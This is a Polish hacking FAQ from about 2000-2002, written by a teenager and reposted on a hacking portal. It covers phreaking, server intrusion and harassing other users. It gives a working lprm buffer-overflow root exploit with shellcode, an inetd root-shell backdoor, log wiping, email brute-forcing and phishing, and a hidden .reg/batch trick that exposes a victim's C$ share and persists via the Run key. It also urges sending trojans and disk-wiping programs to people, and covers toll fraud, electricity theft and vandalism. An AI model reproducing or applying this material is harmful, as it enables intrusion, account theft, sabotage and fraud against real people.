Hacking  
  Wrzesień 23 2014 08:17:32  
 
Nawigacja
folder Portal
. Artykuły
. Download
. Forum
. Szukaj
. FAQ
. Regulamin
folder Hacking
. Gry Hakerskie
. Filmy
folder Delphi
. Kursy
. Faq
. Źródła
. Komponenty
. Artykuły
folderWebmaster
. JavaScripts
. Skrypty PHP
folderRóżne
. Kontakt
. Zlokalizuj ip
Aktualnie online
. Gości online: 2

. Użytkowników online: 0

. Łącznie użytkowników: 152,014
. Najnowszy użytkownik: fish2048
Ostatnie artykuły
. Metoda ataku symlin...
. Asembler x86 w pigułce
. Binder plików z komp...
. [Asembler/MASM] Pobi...
. Braifuck 4 fun
Nawigacja
Artykuły » Faq - hacking » faq spinacz2
faq spinacz2
===============================================================
[SIGMA FAQ]
BY SPINACZ
2000-2002
Wersja poprawiona
===============================================================
===============================================================

**SPIS TREŚCI**

WSTĘP
A) O mnie
B) Co jest...(dział dla was)
c) I co dalej ?
PHREAK
a) info
b) Kilka trików
c) Opis tone dilera
d) Linki
e) Forum
HACKING
a) Podstawy
b) Kilka Pojęć
c) Co to jest expolit
d) Kilka Expolitów
e) Jak wgrać expolita na serwer
f) BackDoory
+ Co to jest
+ Jak postawić backdoora
g) Co robić jak cię złapią
h) Kilka sposobów na lamera
i) Ataki
j) Skanowanie
k) Bugi
Kilka miejsc dla lamerów
a) Jak zhackować komuś konto
b) Jak się włamać w sieci lokalnej
c) Linki
d) Forum
CRACKING
a) Podstawy
b) Przegląd faq
c) Dissembler
d) Opisy programów
e) Linki
Dodatek :
a) Fak mail
b) Bomb mail
c) Anonimowość
d) IRC
E) Budowa firewalla
f) Wstęp
g) Zarządzanie firewallem
h) Parametry ipchains
i) Budujemy firewalla
j) Włączamy pliki windows spod linuxa
C/C++
a) Info
b) Kursy
c) Komplikatory
d) Linki
Carding
a) Info
b) Co za to grozi
c) Generatory + opis
Windows
a) Rejestr
b) PWL
c) Sztuczki
d) Linki
e) Przyśpieszamy windowsa
f) Sprawdzamy wirusa bez antywirusa
Linux
a) Podstawy
b) Minidystrybucje + opis
c) Linki
d) Forum
e) Bonus konfiguracja linuxa freesco
Lamers
a) Kto to jest lamer
b) Najwięksi lamerzy
c) Kilka porad
Protokoły komunikacyjne
a) IP co to jest
Historia internetu
Hasła do zinów
Zakończenie
a) linki
[Specjalne podziękowania !!!]
b) kilka słów
===============================================================


Wstęp

Na wstępie mówie, że nieodpowiadam za ewentulane szkody wyżądzone przez tę lekturę:).... Nie wolno wykorzystywać tego faq w celach niezgodnych z prawem. Zgadzam się na rozpowszechnianie tego faq ale w całości tak jak jest zamieszczony na mojej stronie. W poprawionej wersji poprawiłem błędy i dodałem kilka działów. Teraz ma licencje GNU czyli zezwalam na poprawienie błędów :). Jak macie jakieś problem możecie pisać na |hack.zone@wp.pl| jak będę wiedział napewno odpowiem........:)

a) O Mnie

I tak napewno mnie znacie. Jestem Spinacz, mam 14 lat (niewiele), ale trochę wiem o wszystkim. Uwielbiam komputery prawie jak taką laskę z mojego miasta. Zajmuję się problematyką hackingu jakieś pół roku to nawet dużo :) goście którzy pisali zinki znali się na tym jakieś 2 miesiące ale byli bardzo dobrzy (byli) teraz stare pokolenie już nie zajmuje się hackingiem....pracują w dużych firmach jako admnistratorzy chodz na IRC można ich spodkać...Moim wrogiem nr. 1 jest szkoła a później rodzice którzy mówią "wyłącz ten komputer lepiej się poucz",bo mi się chce aż mnie rwie.......Ostatnio zajmuję się programowaniem w C++. Potem zaczne Assemblera ale narazie muszę nauczyć się dobrze C++. Programuje dobrze w Delphi, Javie Script, Html i trochę w Basicu. Jak macie jakiś problem to piszcie do mnie jak będę wiedział to odpowiem (pytania mogą być głupie).Jak każdy normalny człowiek lubię sobie podzwonić za darmo normalne. Kocham phreak !!!

B) Co jest...Dział dla was wszelkie pytania jakie piszecie to tu umieszcze.

czesc to ja KeRToiP pewnie mnie nie znasz ale to nic.:-)
masz moze login i chaslo na 0800202122 ??

Niestety do tego numeru nie mam loginu i hała podobno jest długie, ale jak chcesz to są inne callbacki tam niżej z loginem i hasłem.

prosze o haslo do stronki


Jak odpalić h@ckpl ? Anonymus

Pytasz mnie jak to odpalić poczytaj moje strsze faq tam są do nich hasła, ale umieściłem je też na końcu. Polecam h@ckpl dlatego, że są tam szczegółowe opisy włamań................:-

ty draniu jestem root.

Nie jestem żadnym draniem egoisto.

przydal by sie przepis na wlam na serwer i podmiane strony ze zdjeciami i opisami uzytych programow

Nie ma tak naprawdę jednego dobrego przepisu na włam na serwer jest tyle sposobów ile hackerów ja polecam expolity.

Jak bedziesz mial gandzie pisz

Jebany żulu z Pszowa ja już się domyślam kim tak naprawdę jesteś schizol :)

Prześli mi wg. ciebie nalepsze faq dla początkujących

Nie będę nikomu przysyłać faq, bo są do ściągnięcia na mojej stronie. Wdług mnie nalepsze dla początkujących są aaaa nie ma. Trzeba czytać co się da potem je zrozumiesz.

you spinacz nie jestem zadna laska jestem chlopakiem ty potrzebuje ten program on lamie chasla w poczcie??? przeslij mi go prosze mincrack.zip - Wyciaga ostatnio uzyte przez program "Minuet" haslo do emaila (11 KB).

Tak, ale ma wade działa jedynie na Windozie 95 i 98. Na ME występuje błąd. Przysłałem ci go już.

Jeste ich jeszcze jakieś 20 ale nie chce mi się pisać i odpowiem na nie e-mailem.

c) I co dalej ? Mam zamiar napisać zina ojjj nie znam się na tym C/C++ ale coś spróbuje.......może ktoś się chce przyłączyć i napisze jakiś tekst, albo zna się na C/C++ albo Pascalu i chciałby skonstruować zina. Wszystkich chętnych proszę o kontakt na mój e-mail albo na GG.

Phreak

a) Info

Specjalna grupa hackerów nazywa się "prejkerami". Na wstępie mówie, że phreak jest nielegalny i karalny prawnie jak hacking !!! Phreakerzy są osobami, którzy mają na celu oszukiwać telekomunikacje i dzwonić za free co się nie podoba (bardzo) telekomunie. Phreaking zaczął się w latach 70-tych gdy John Drapper odkrył, że dołączone do płatków gwizdki generują taką samą częstotliwość jak żetony wrzucane do automatów. Phreaking rozwijał się przez lata aż doszedł do teraźniejszej postaci i coraz więcej osób nim się zajmuje. Teraz już jest na takim poziomie, że służy głównie do dzwonienia z budek za darmo ale również do aktywacji kart sim. Najwięcej phreakerów działa w małych miastach gdzie telekomunikacja nie ma tak dobrze zabezpieczonych budek. Osoby które podpinają się do lini sąsiada lub sąsiadki (laski) są także phreakerami ale zwanymi pajęczarzami. Phreakerzy głównie używają boxów, które dzielą się według kolorów. Jak chcecie wiecej na temat boxów to istnieje specjalna strona do przeszukiwania czarnej strony siecie na http://www.astalavista.box.sk. Phreakerzy również używają tonedilera. Jest to mała skrzynka z klawiaturką i głośnikiem, która generuje ton.


b) Triki

Z komórki za darmo

Chcesz dzwonić z komórki za darmo ? Nic trudnego.
Robimy tak
1. wybieramy numer
2. naciśnij yes
3. gdy wyświetla sie napis connecting nacisnij CLR
4. nacisnij 0
5. potem #
6. teraz dwa razy NO
I to wszystko jak chcesz sie rozłączyć wyjmij baterie

Chcesz darmowy internet

Potrzebne ci są callbacki czyli takie numery, które wpisane do połączenia dzwonią za darmo tylko, że cię łatwo namierzyć. Oto kilka
1.0800202122 login: ? hasło: ?
2.080020127 login: ? hasło: ?
3.080020019 login: unknown hasło: unknown
4.080020023 login: ? hasło: ?
5.080020866 - login: ppp ; hasło: ppp
6.080020866 - login: koliber ; hasło: koliber
7.080020034 - login: adam2 ; hasło: b34fro
8.080020041 - login: unknown ; hasło: unknown

Odrazu mówie, że niektóre nie działają podobno jak niedziałają należy przed numerem postawić 48. Uważaj, bo jak z domu dzwonisz to cię namierzą.

FREE

Dzwonisz na darmowy numer panstwowy np: 997
Rozlaczasz sie i wykrecasz od razu nowy numer
Gadasz ile wlezie
Rzadko dziala :(


Światło za 2 złote

To jest prosty sposób ale działa tylko na blokach musimy pociągnąć kabel z piwnicy i płacimy za światło symboliczne pieniącze.

Darmowy sms

Jak masz komóre to możesz posyłać darmowe sms. Jak wysyłasz sms to są takie dwie koperty które wędrują jakieś 3-4 razy jak wędruje pierwszy raz i jest przy samym końcu wyłącz komórke a sms przyjdzie za darmo. Działa na simensach !!!

Jak zdenerwować telekomune

Dzwonimy na 0800 100 200 i mówi nam babka z telekomuny dzien dobry....a my do nich dlaczego wasi kilienci mówią na was "telekomuna" babka zbladła i mówi, że tu na ten temat się nie rozmawia :)

Darmowa coca-cola

Podchodzimy do automatu z coli i wrzucamy 20 zł ale starych, automat wyrzuca cole i wydaje z 5 zł

Dymiący się Urmet

Otwieramy urmeta i wyjmujemy czytnik...a na płycie głównej przykleja się taśmą kilka zapalonych papierosów i zamykamy budke za chwilę będzie się palić

Papierosy za darmo

Na to jest kilka sposobów ale ja pokaże jak zrobić se fajke ekologiczną i nie robiącą nic naszym płucą a smakuje jak papieros.
Musimy znaleźć trochę mięty u mnie rośnie tego pełno...suszymy mięte i robimy z tego skręta no i mamy blantospinacza !!!

Płyty pirackie za darmo

Idziemy do pirata i zamawiamy płytkie jaką chcemy. Teraz daje nam ją i mówimy "biorę ją za darmo, bo jak nie to was kapne" i działa.

Jednoimpulsówki

Robimy tak podchodzimy do budki i wciskamy 0803 teraz czekamy 25 sygnałów (więcej nie będzie) i gdy jest ostatni to przy samym końcu wciskamy 0 teraz czekamy aż będzie cisza i wystukujemy jaki numer chcemy ale mamy 1 impuls i jeszcze jedno działa na srebrnych urmetach u mnie są tylko takie prócz z telefoniki na CHIP. O jak dzwonisz na komórkę to masz zaledwie 13 sekund.

Coś innego

Jak dzwonimy to gdy mamy na wyświetlaczu O impulsów wciskamy 0 i gadamy ile chcemy. Proste jak drut kolczasty.

c) Opis tone dilera

Co to jest tone diler ? Nie będę tu dokładnie się zagłębiać w temacie :) Jeste to po prostu system odsłuchujący do sekretarek firmy Panasonic. Jest wielkości 10*7. Jest to taka czarna skrzynka z klawiaturą. Można go kupić w większych miastach za 22 zł + vat. To i tak niska cena dlatego, że się to zwróci. Te urządzenie ma wszechstronne zastosowanie. Dzięki niemu możemy za darmo dzwonic z budek !!! Z tone dilerkiem można wszystko. Tak przy okazji można go złożyć samemu ale jeśli się nie znasz na elektronice to ci nie polecam, bo po złożeniu w 90 % przypadkach nie działał a forsa do kubła, więc lepiej go kupić :) Generuje częstotliwość 220 Hz i dzięki temu dzwonimy za darmo.

d) Linki

Phreak

http://www.phreak.hack.pl
http://www.phreak.pl

e) Forum

Chciałbyś porozmawiać na forum możesz to zrobić na mojej stronie http://hackerzy.glt.pl hasło do forum to "kondor" Już kilka osób się wypowiedziało możesz i ty :) i jak chcesz na mojej stronie jest bramka IRC to sobie możesz porozmawiać bez klienta mIrc-a.

HACKING

a) Podstawy

Najpierw jak chcesz być chakerem to zainstaluj sobie linuxa, bo bez niego dużo nie pohackujesz. Jak już masz linuxa radze ci załatwić sobie stałe łącze chyba, że chcesz płacić duże rachunki za telefon tak jak ja (tego nie polecam). Teraz ściągnij sobie dużo faq na początek starczą ci jakieś 100 a potem ściągaj najnowsze i ile możesz. Musisz czytać, czytać i jeszcze raz czytać. To jest normalne, że na początku nic nie będziesz rozumiał ale po czasie będziesz dobry. Jak już wszystko rozumiesz to zkombinuj se expolita na twojego linuxa są na mojej stronie. Teraz załuż sobie u siebie jakieś konto i uruchom expolita u siebie. Dostaniesz roota to się ciesz.......teraz znajdz sobie jakiś serwerek i poproś ladmina aby ci dał konto shellowe tam na dole są linki jak chcesz shella. Teraz szukasz expolita odpowiedniego i uruchamiasz go na serwerku (kopiujesz na shella). Dostałeś roota to postaw backdoora i wymaż logi (posłuż się programem), bo jak nie to masz przejeb@ne, możesz jeszcze zrobić pętle. Dobra teraz czytaj najnowsze faq i próbuj się włamywac...:-|

b) Kilka pojęć dla lamerów

Expolit-jest to program który daje hackerowi status root'a i nie tylko
Root-jest to główne konto administratora na linuxie dzięki niemu możemy robić
wszystko poprostu mamy władze nad systemem
fakemail-fałszywy list
firewall-jest to zapora ogniowa antyhacker
urmet-poprostu budka telefoniczna
bacdoor-są to tylne drzwi dzięki nim nie musimy się logować wchodząc na serwer
bugi-są to dziury np. w systemie albo w programie (chodz nie zawsze)
konto shellowe-jest to konto które możemy dostać od admina albo go wykupić(linuxowskie).

c) Co to jest expolit

Wyżej już wyjaśniłem ale teraz wyjaśnie trochę głębiej. Jest to program napisany w C który daje po zkopiowaniu na serwer roota. Na każdy system jest inny expolit. Przed użyciem należy go zkomplikować oto przykładowy expolit

-------------3lprm.c-------------

#include

#define ALIGN 13 // Try from 0 to 16
#define STRCPY 0x8048a98 // channge it if you find right ALIGN
// (it was 0x8048a98 in my case ;)
#define DEST 0x804c010
#define OFFSET 0x381f+5
#define PRINTER "-Plp"

int *ptr;
char *cptr;

void main(int argc, char *argv[]) {

char buff[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

char shellbuf[16384];
int i;
int src= (int)&src;

/* fill the buffer with nops */
memset(shellbuf, 0x90, sizeof(shellbuf));
shellbuf[sizeof(shellbuf)-1] = 0;

cptr = (char *)(shellbuf+100);
for(i=0;i < strlen(buff);i++)
*(cptr++) = buff[i];

ptr = (int *)(shellbuf+1000+ALIGN);
*ptr++ =STRCPY;
*ptr++ =DEST;
*ptr++ =DEST;
*ptr++ =src + OFFSET; // Try to play with it if any problems.
*ptr++ = 0;

printf("sp= 0x%x\nsrc= 0x%x\n",src,src+OFFSET);

execl("/usr/bin/lprm","lprm",PRINTER,shellbuf,NULL);
}

---------------end---------------


d) Jak wgrać expolita ?

Napisze jak zrobić to pod WINDOWS'EM na FTP(shella)

Otwierasz dosa pod shitem i logujesz się na twoje konto(shella) teraz piszesz
ftp
open serwer.org.pl (serwer)
login: spinacz (login)
pass:(hasła niegdy nie widać)
ftp> bin
ok
ftp> hash
# - ok
ftp> mput c:\expl\expl.c (ścieżka gdzie jest expolit)
ok
quit
No i mamy expolita wgranego na serwer jest to najprostszy sposób :).................

e) Backdoory

* Co to jest

Backdoory są to tylne drzwi.Dzięki nim możemy wejść na serwer bez loginu i hasła. Najpierw musisz mieć roota aby założyć backdooraje . Dzięki niemu nie będziemy się musieli logować na serwer.

* Jak postawić backdoora

# cat /etc/services
tcpmux 1/udp #TCP Port Service Multiplexer
compressnet 2/tcp #Management Utility
compressnet 2/udp #Management Utility
compressnet 3/tcp #Compression Process
compressnet 3/udp #Compression Process
ftp 21/tcp #File Transfer [Control]
hostnames 101/tcp # usually from sri-nic
iso-tsap 102/tcp # ISO nic
x400 103/tcp # ISO mail

Legenda :

Pierwsza kolomna to nazwa serwera
Druga to numery portów
Trzecia to opis

# cat /etc/inedt.conf

ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A
telnet stream tcp nowait root /usr/libexec/tcpd telnetd
shell stream tcp nowait root /usr/libexec/tcpd rshd
login stream tcp nowait root /usr/libexec/tcpd rlogind -a
x400 stream tcp nowait root /usr/libexec/tcpd rexecd

# do pliku /etc/inetd.conf

tst stream tcp nowait root /bin/bash -i

Po tym nalezy zresetowac calego daemona, by uaktualnic ustawienia
killall -HUP inetd
I teraz telnetujemy się :host 1790
trying serwer.org.pl
#bash
#whoami
root

Ja tylko narazie znam takiego backdoora wiadomo jeszcze się ucze dużo pomogła mi lektura LamCkera :) Pamiętaj loginy, nazwy serwerów są zmyślone !!!............

g) Co zrobić jak cię złapią ?

Jak cię złapią to masz przesrane !!! Chodz nie zawsze dlatego, że niektórzy administratorzy są kulturalni. Jak im powiesz jak to zrobiłeś to zostawią ci konto z rootem a admin będzie na drugi raz uważał i tego błędu nie popełni. Pragne tu przedstawić dowcip który jest prawdziwy : " Przy stole siedzą kulturalny admin, krasnal i policjant...na stole jest kotlet i po pewnej chwili gaśnie światło i nie ma kotletu i kto go zjadł ? Oczywiście policjant, bo kulturalnych administratorów ani krasnali nie ma " - dobre nie sam wymyśliłem bo jam kapitan mineta !!! Jak cię złapią to mów, że tego nie zrobiłeś i tak napewno admin cię będzie śledzić więc radze ci powiedzieć znajomym żeby ci nic nie przysyłali o tematyce hackingu poczekaj po jakiś 3 miesiącach powinni ci dać spokój ale jak cię złapią na gorącym uczynku to idziesz do pudła na 5 lat i płacisz dużą grzywnę (współczucia)

h) Kilka sposobów na lamera

sposób 1

Wirusy

Jak gościu jest lamerem pośli mu e-mailem wirusa ale go spakuj. Najlepiej jak mu poślesz anonimowego e-maila. Będzie śmiesznie !

sposób 2

Duży rachunek

Jak chcesz aby gościu miał duży rachunek za telefon to pośli mu e-maila, że jeżeli chce obejżeć fajne laski na twojej stronie to niech wejdzie na www.xlaski.pl ha ha 3 zł/1min

sposób 3

Jak ma stałe

Jak lamer ma stałe łącze nie ma innej rady posyłasz mu trojana i bawisz się jego kontem powiedz mu żeby posłał ci e-miala i teraz dajesz ctrl+F3 i sprawdz jego IP

sposób 4

Chamska rada

Daj mu fajny program DANGER ja rozdałem go na całym osiedlu to coś nie jest wykrywany przez antywirusy a jak go uruchomi to przez 3 sek sformatuje mu dysk jak go chcesz to ci go przyśle Jest OK

i) Ataki

Sniffing

Jest to metoda na podsluchiwanie sieci jest to mozliwe w sieci LAN. Jest to jedna z najlepszych metod uzyskiwania informacji z inego komputera. Mozemy dzieki sniffingowi znac password innego komputera w sieci. Sniffinga jest latwo wykryc i latwo mozna go zniszczyc wysylajac pakiet lub ping............

Wirusy

Wirusy mają zdolnośc przyklejania się do innych plików niektóre najpierw się rozmnażają a potem atakują niektóre odrazu robią format c:\ a inne nie są tak groźne ja miałem tylko wirusa który nazywał się kaczkofan 004 i przez niego nie działał mi cd-rom a na dysku mam spakowanego a love i anna kurnikowa, romeo i julia itp. Łatwo sprawdzić bez antywirusa czy jest wirus uruchamiamy MS DOS i wpisujemy Chkdsk w przed ostatniej linijce musi być
655 360 wszystkich bajtów pamięci jeśli tyle nie masz to masz vira i zainstaluj sobie NORTONA, bo może być źle..........:)

Expolity

Explolit wykorzystuje bugi w systemie i może dać nam status roota. Przeważnie potrzebujesz konto na tym systemie aby użyć explolitu chodź nie zawsze (expolity zdalne) !!! Wbrew pozorom jest go łatwo użyć.

Trojany

Metoda trojana to chyba najłatwiejsze co może być najpierw uruchamiamy serwer (trojan składa się ze serwera i klienta) i go konfigurujemy potem najlepiej spakować klienta i wchodzimy na IRC gadamy z gościem na IRC i mówimy, że mamy fajnego pornola albo coś takiego i wysyłamy mu go a jeszcze jedno potrzebujemy IP gościa sprawdzić go można na IRC wpisujemy /whois_nic gościa i mamy IP teraz gościu otwiera trojana a my uruchamiamy serwer i w miejscu hosta wpisujemy IP gościa i łączymy się zdalnie możemy pogrzebać mu teraz na dysku lub wysunąć mu cd-rom wzależności od trojana życze miłej zabawy.

DoS

Polega Na Blowkowaniu Serwerów, wysyłamy mnóstwo pakietów IP itp. po czym serwer Się Wiesza.

Spoofing

Jest to metoda podszywania sie pod czyis IP zaufany dla serwera. Dzieki czemu mozemy sie podszyc pod czyis IP i wejsc niezauwazeni do systemu. Dodatkowo mozemy teraz zostac jeszcze anonimowi.

Sniffit

Jedyny interesujacy sniffer pod Linuxa mozna go równiez odpalic z shella.

Narazie to wszystko.

j) skanowanie

Na poczatku mowie, ze skanowanie jest nielegalne i gdy skanujemy to serwer zbiera informacje o nas dla admina.
Skanujac wyszukujemy bledy w serwerach dzieki czemu mozemy przez dziury sie wlamac.

7th Sphere PortScan 1.1 :

Zaczynamy,instalujemy Portscan i Wlaczamy go :) Po kliknieciu przycisku 'about' pojawiaja nam sie informacje o tymze programie, nick jego stwórcy itp. Po kliknieciu przycisku 'clear' czyscimy to okienko na dole :) W tym wlasnie dolnym okienku beda nam sie pojawialy wszytskie informacje o danym serwerze, który akurat skanujemy W polu 'Filename:' mamy podana sciezke pliku w którym beda zapisywane logi skanowanego serwera Mozemy ta sciezke oczywiscie dowolnie zmienic W polu 'Scan:' wpisujemy host serwera który chcemy skanowac Np: cable.net.pl ;] Po kliknieciu przycisku 'start' zaczyna sie skanowanie W polu 'send port' podajemy port od którego chcemy zaczac skanowanie,domyslny jest port: 1 W polu 'stop port' wpisujemy port na którym chcemy zaprzestac skanowanie, domyslny jest port: 65536 Oczywiscie mozemy zmienic te liczby wedlug wlasnego upodobania Po rozpoczeciu skanowania czesto pole 'host' zmienia sie w IP danego serwera Przyciskiem 'halt' zatrzymujemy skanowanie, mozemy to robic w dowolnym momencie. Przyciskiem 'save' zapisujemy wszystko co mamy w dolnym okienku (wyniki skanowania). Do pliku podanego w polu 'Filename:'. Po wcisnieciu przycisku 'reset' program resetuje zmienione przez nas opcje i wraca do stanu poczatkowego. Gdy zaznaczymy opcje 'scroll' to pasek boczny na dolnym okienku zawsze bedzie sie sam przesuwal w dól. Gdy go odznaczymy (zalecane) to mozemy dowolnie przewijac bocznym paskiem. Przy przerwaniu skanowania przyciskiem 'halt' skaner podaje na jakim porcie zakonczylo sie skanowanie. Podaje tez wersje zabezpieczen (ssh czy ssh2), wersje sendmaila (program pocztowy) oraz wersje serwera ftp. Przycisk 'reset' zamyka wszystkie sockety. W polu 'Recv port:' jest napisany port który jako ostatnio dalo sie otworzyc skanerem. Pole 'Delay(ms):' predkosc laczenia z portem Opcja 'reset on halt' oznacza ze po przerwaniu skanowania poleceniem halt jednoczesnie wlaczy sie przycisk 'reset'. Opcja 'save on halt' oznacza ze po przerwaniu skanowania poleceniem halt jednoczesnie wlaczy sie przycisk 'save' W polu 'Open Sockets' podana jest liczba otwartych socketów Opcja 'quick scan' jest dziwna, predkosc skanowania niezmienia sie Opcja 'overwrite' tekst podany w pliku na dole na nowy tekst w dolnym okienku. Gdy przed skanowaniem zaznaczymy opcje 'debug' to skaner bedzie nam po kolei pokazywal czy sie laczyl czy nie na kazdym! porcie W przypadku normalnego skanowania skaner wyswietla tylko porty z których udalo mu sie polaczyc Jeszcze jedna uwaga gdy zakonczycie skanowanie komenda 'halt' i klikniecie clear to skaner skanuje dalej od portu na którym wczesniej skonczyl skanowanie, by calkowicie zakonczyc skanowanie wcisnij 'reset'. W sumie zeby zeskanowac wszystkie dziury serwera moznaby uzyc kilku skanerów Bo jeden tylko moze niewykryc wszystkich dziur. Na razie tyle, milego skanowania :)

WgateScan 3.0 for Win98 by Pixel/Edena :

W sumie nie jest to taki skaner jak inne Bo wyszukuje on backdoory na serwerze :) (chyba) W oknie po prawo wypisywane sa one w polu 'serwer(s) found' Przyciskiem 'clear' mozna wyczyscic liste serwerów przyciskiem 'save' mozna zapisac obecna liste serwerów Jesli skaner znajdzie jakis backdoor to pokaze to na koncu skanu Po kliknieciu na przycisk 'about' dostajemy kilka informacji o samym programie Po kliknieciu przycisku 'quit' wychodzimy z programu W polu 'hostname or IP' podajemy host lub numer IP serwera który chcemy skanowac Przyciskiem 'del' czyscimy pole 'hostname or IP' Na dole programu pokaze sie jakie IP odpowiada danemu hostowi wpisanemu w pole 'hostname or IP' Dzialanie tego skanera polega na tym ze skanuje on dany host od IP xxx.xxx.xxx.1 do IP xxx.xxx.xxx.255 Czyli jesli IP tego serwera to np: 123.456.789.xxx to skaner bedzie skanowal od IP: 123.456.789.1 do IP 123.456.789.255 W polu Scan progress pokazane jest ile juz procent serwera zostalo zeskanowane W polu 'host position' pokazanye jest który IP wlasnie jest skanowany np: jesli jest to host: 26 To skanowane jest obecnie IP: xxx.xxx.xxx.26 W polu 'Scan the port n*' pokazany jest port który ma byc skanowany (chyba ;]) W polu 'Open the port and try to receive the string' program stara sie odebrac od serwera tekst napisany w okienku W polu 'Open teh port and try to send the string' program stara sie wyslac do serwera tekst napisany w okienku W polu 'Try to open the port only' program stara sie jedynie otworzyc na danym serwerze podany port Przyciskiem 'Scan!' rozpoczynamy skanowanie danego serwera Przycisk 'options' (hmm jest tego duzo,ale kilka rzeczy opisze) : - zeskanowane adresy IP zapisywane sa w pliku podanym w okienku 'Scanned IP' (sciezke okresla sie kropeczkami) - znalezione serwery sa zapisywane w pliku podanym w okienku 'Found servers' (sciezke okresla sie kropeczkami) - pole 'Save server's list' - po wyjsciu z programu aktualna lista serwerów zostaje zapisana - pole 'save this options nad state to registry' zapisuje zmiany z okna 'options' w podanym kluczu w rejestrach - pole 'connection timeout' okresla po ilu sekundach rozlaczyc sie w przypadku braku polaczenia (chyba ;) - nierozumiem znaczenia tych dwóch pozostalych górnych opcji

j) Bugi

Jest pewien fajny sposób na wodomierze
Zatykasz wylot z wanny korkiem
Otwierasz kran tak zeby woda powoli kapala,lecz nie za wolno
Wychodzisz z domu
Gdy wrócisz wanna bedzie pelna wody
A wodomierz przesunie sie najwyzej o kawaleczek lub wcale ;]

Jest ukryta opcja w IE 5.0,niedziala on ajuz w IE 5.01
Utwór na pulpicie nowy plik *.txt
Napisz w nim to co jest tam: ->tu<-
Teraz zapisz plik i zmien jego nazwe na: test.htm
Po otwarciu pliku ukaze ci sie animacja :)
Okazuje sie ze jest sposób a by shakowac sapera ;]
Dzieki temu mozna przejsc go w jedna sekunde
Wiec wlaczamy sapera
Klikamy na jedno z pól,wlaczy sie wtedy zegar
Wciskamy naraz lewy i prawy klawisz myszki


i) jak zhackować komuś konto np. na republice

Pytasz mnie jak shackować konto na republice. Są dwa sposoby programowy i lamerski. Najpierw lamerski.
Dajesz podpowiedz hasła jak gościa znasz to odpowiesz na pytanie i dostaniesz hasło a jak nie znasz to
robisz sobie lewe konto na wp np.xlaska@wp.pl i posyłasz mu e-maila, że chcesz go poznać itp niech napisze
wzależności od pytania np. jakie jest marzenie twojego życia przyśle ci odpowiedz i dostaniesz hasło
działa na 95 % lamerów. Teraz programowy. Ściągasz brutusa2. Potrzebujesz dwa słowniki bo Brutus ma małe.
Teraz jak masz słownik załaduj go do User File (z imionami) a do Pass z hasłami. Na samej górze masz napis
Type tam zmieniasz na POP 3 minimalizujesz brutusa w dosie piszesz ping www.poczta.onet.pl dostajesz jej
IP i wklejasz w brutusie w miejsce Target teraz start i powinien znaleźć ci hasło. Masz hasło i robisz
co chcesz z jego kontem !!!

j) jak się włamać w sieci lokalnej

Metoda ta jest już trochę przestarzała i łatwa do wykrycia (a jednak nadal skuteczna), dlatego zdecydowałem się ją opisać.

Chyba każdy z nas miał już kiedyś do czynienia z rejestrem. Poprzez wpisywanie odpowiednich kluczy i wartości można całkowicie zrekonfigurować Windowsa i znacznie ograniczyć dostęp do zasobów komputera. W kluczu:


HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Network\LanMan\(udostępniony folder lub drukarka)
zapisana jest konfiguracja wszystkich udostępnionych zasobów na naszym komputerze (folderów i drukarek). W kluczu tym znajdują się następujące zmienne :

Flags:
101, 191 - folder udostępniony tylko do odczytu
102, 192 - folder udostępniony do odczytu i zapisu
103, 193 - folder udostępniony w zależności od podanego hasła
Parm1enc, Parm2enc - zakodowane hasła (maks. 8 liter)
Path - ścieżka dostępu do folderu
Remark - opis
Type:
0 dla folderów
1 dla drukarek.
Manipulując tymi wartościami łatwo zmieniać konfiguracje udostępnień na swoim komputerze, ale jak wykorzystując rejestr systemowy aby zmienić i/lub odczytać konfiguracje innego komputera w sieci. Bardzo prymitywnym sposobem jest podsunięcie komuś w sieci zwykłego pliku rejestru. Np. takiego:


REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Network\LanMan\C$]
"Flags"=dword:00000192
"Type"=dword:00000000
"Path"="C:\\"
"Parm2enc"=hex:
"Parm1enc"=hex:
"Remark"=""
Wzór pliku in.reg można bardzo łatwo uzyskać eksportując z rejestru zapis dowolnego udostępnienia. Później wystarczy odpowiednio go zmodyfikować (zmienić nazwę udziału, ścieżkę dostępu itd.)

Kiedy użytkownik na innym komputerze uruchomi ten plik (domyślnie - scalaj) wówczas informacje zostaną wprowadzone do rejestru systemowego. Po ponownym starcie systemu na komputerze ofiary będziemy mieli swobodny dostęp do jego dysku C (znaczek '$' przy nazwie udostępnienia oznacza, że udział nie będzie widoczny w Otoczeniu Sieciowym). Jak już wspomniałem metoda ta jest bardzo prymitywna choćby ze względu na komunikat, który pojawi się na ekranie komputera informujący o wprowadzeniu zmiennych do rejestru. Dlatego powinniśmy zadbać o to aby program regedit.exe był uruchamiany z parametrem /s - to zapewni nam dyskrecję. Można to zrobić wykorzystując plik *.bat:

regedit.exe /s \\twoj_komp\katalog$\in.reg
del plik.bat

Wówczas użytkownikowi podsuwamy tylko plik start.bat, po uruchomieniu którego zawartość in.reg zostanie wprowadzona do rejestru. Podobnie bardzo łatwo można wyciągnąć zapis konfiguracji udostępnionych folderów z innego komputera w sieci (takiego, który swe zasoby ma zabezpieczone hasłem, bo tylko wtedy ma to sens):

regedit.exe /s /e \\MAX\folder$\out.reg
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Network\LanMan
del plik.bat

folder$ - musi być to folder ustawiony jako "pełen dostęp"

Powyższe dwa sposoby dają nam możliwości jednorazowej zmiany lub jednorazowego pobrania informacji z rejestru. Ale co zrobić, żeby za każdym razem nie zmuszać użytkownika do uruchamiania bata? W tym celu należy wykorzystać inny klucz w rejestrze:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

Tam właśnie zapisane są ścieżki wszystkich programów, które uruchamiane są po starcie systemu. Do tego klucza musimy wprowadzić odpowiednie zmienne, które zapewnią nam stały dostęp do rejestru systemowego innego komputera. W tym celu możemy wykorzystać opisaną wyżej metodę (pliku bat). Plik in.reg powinien wyglądać następująco:

------in.reg------
REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"WinStart"="regedit.exe /s /e \\\\MAX\\TAJNY$\\out.reg
